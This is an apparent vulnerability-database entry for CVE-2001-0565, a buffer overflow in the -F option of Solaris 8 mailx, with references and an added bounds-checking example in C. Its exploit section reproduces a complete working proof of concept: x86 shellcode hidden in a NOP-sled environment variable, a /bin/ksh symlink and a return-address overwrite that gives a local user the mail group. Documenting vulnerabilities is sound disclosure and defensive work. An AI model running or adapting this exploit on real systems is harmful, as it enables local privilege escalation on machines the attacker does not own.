Solaris mailx -F Buffer Overflow Vulnerability

Vulnerability ID: 1106273
Vulnerability type: Buffer overflow
Published: 2001-04-01
Updated: 2005-05-02
CVE ID: CVE-2001-0565
CNNVD ID: CNNVD-200108-072
Platform: Solaris
CVSS score: 4.6
|Sources
https://www.exploit-db.com/exploits/20772
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-072
|Details
mailx in Solaris 8 and earlier contains a buffer overflow. A local attacker can gain additional privileges by passing an overly long '-F' command-line option.
|Exploit
source: http://www.securityfocus.com/bid/2610/info

Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.

A problem with the handling of a long string of characters by the -F option makes it possible for a local user to gain elevated privileges. Due to the insufficient handling of input by the -F option of mailx, a buffer overflow at 1150 characters makes it possible to overwrite variables on the stack, including the return address.

This problem makes it possible for a local user to gain elevated privileges, attaining an effective GID of mail.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*

   /usr/bin/mailx overflow proof of concept.


   Pablo Sor, Buenos Aires, Argentina 04/2001
   [email protected], [email protected]

   works against x86 solaris 8

   default offset should work.

   usage:

   bash$ id
   uid=100(laika) gid=1(other)

   bash$ ./mailx-exp
   Subject: tomy
   .
   EOT

   [wait...]

   $ id
   uid=100(laika) gid=1(other) egid=6(mail)


*/

/* Returns the current stack pointer: the value left in %eax becomes the
   function's return value (32-bit x86 only). */
long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{

/* Solaris x86 payload; its tail is the string "/tmp/xx". */
char shell[]=
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
"\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";

 unsigned long magic = get_esp() + 2075;  /* default offset */
 unsigned char buf[1150];                  /* the -F argument: 1149 bytes plus NUL */
 char *envi;

 /* NOP sled followed by the payload, handed to mailx as the SOR= environment variable */
 envi = (char *)malloc(300*sizeof(char));
 memset(envi,0x90,300);
 memcpy(envi+280-strlen(shell),shell,strlen(shell));
 memcpy(envi,"SOR=",4);
 envi[299]=0;
 putenv(envi);

 symlink("/bin/ksh","/tmp/xx");
 memset(buf,0x41,1150);
 memcpy(buf+1116,&magic,4);
 buf[1149]=0;
 execl("/usr/bin/mailx","mailx","-F",buf,NULL);
 return 1;                                 /* only reached if execl fails */
}
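The root cause described above is an option value copied into a fixed stack buffer with no length check, which a 1150-byte -F argument overruns. The following is an added example written for this page, not mailx's source and not the exploit author's code: it shows that pattern next to the bounds-checked form a maintainer would apply. The 256-byte buffer size and all function names are assumptions; the page gives only the 1150-byte overflow point, which the replay helper reuses.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed example: a minimal "-F <address>" option handler written two
 * ways. It is NOT mailx's source; the buffer size is an assumption (the page
 * only states that a 1150-byte argument overwrites the return address). */
#define FROM_BUF_LEN 256

/* Vulnerable pattern: unbounded copy of an argv string into a fixed stack
 * buffer. The caller's frame is corrupted once the argument exceeds the
 * buffer. Shown for contrast only; it is never called with a long input here. */
static void store_from_unchecked(const char *arg, char dst[FROM_BUF_LEN])
{
    strcpy(dst, arg);
}

/* Hardened form: measure the argument against the buffer first and reject
 * it outright. Returns 0 on success, -1 if it would not fit; on -1 dst is
 * an empty string so a caller cannot use a half-copied address. */
static int store_from_checked(const char *arg, char *dst, size_t dstlen)
{
    size_t n = 0;
    if (dstlen == 0) return -1;
    while (n < dstlen && arg[n] != '\0') n++;   /* bounded length scan */
    if (n == dstlen) {                           /* no room for the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Scans argv for "-F <value>" the way a simple option loop would and stores
 * the value with the checked routine.
 * Returns 1 if no -F was given, 0 if stored, -1 if the value was rejected. */
static int parse_f_option(int argc, char **argv, char *from, size_t fromlen)
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-F") == 0) {
            if (i + 1 >= argc) return -1;        /* -F with no value */
            return store_from_checked(argv[i + 1], from, fromlen);
        }
    }
    return 1;
}

/* Replays the page's scenario: a 1150-byte buffer of 'A' (1149 bytes plus
 * NUL, as in the exploit) as the -F value. Returns the parser's verdict. */
static int replay_overlong_from(void)
{
    static char payload[1150];
    memset(payload, 'A', sizeof payload - 1);
    payload[sizeof payload - 1] = '\0';
    char *argv[] = { "mailx", "-F", payload, NULL };
    char from[FROM_BUF_LEN];
    return parse_f_option(3, argv, from, sizeof from);
}

int main(void)
{
    char from[FROM_BUF_LEN];
    char *argv[] = { "mailx", "-F", "alice@example.org", NULL };

    store_from_unchecked("alice@example.org", from);
    printf("unchecked, in-bounds input: %s\n", from);

    printf("checked, in-bounds input: %d (%s)\n",
           parse_f_option(3, argv, from, sizeof from), from);
    printf("checked, 1150-byte input: %d\n", replay_overlong_from());
    return 0;
}
```

Rejecting rather than truncating matters for a sender address: a silently shortened -F value would send mail under the wrong name, so the checked routine fails closed and leaves the buffer empty. Doing the length check at option-parsing time, before any copy, keeps the check in one place regardless of how many buffers the value later flows into.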
|References

Source: US-CERT Vulnerability Note: VU#446864
Name: VU#446864
Link: http://www.kb.cert.org/vuls/id/446864
Source: BUGTRAQ
Name: 20010502 Solaris mailx Vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2001-05/0016.html
Source: XF
Name: solaris-mailx-f-bo(8246)
Link: http://xforce.iss.net/static/8246.php
Source: BID
Name: 2610
Link: http://www.securityfocus.com/bid/2610
Source: BUGTRAQ
Name: 20010511 Solaris /usr/bin/mailx exploit (SPARC)
Link: http://online.securityfocus.com/archive/1/184210
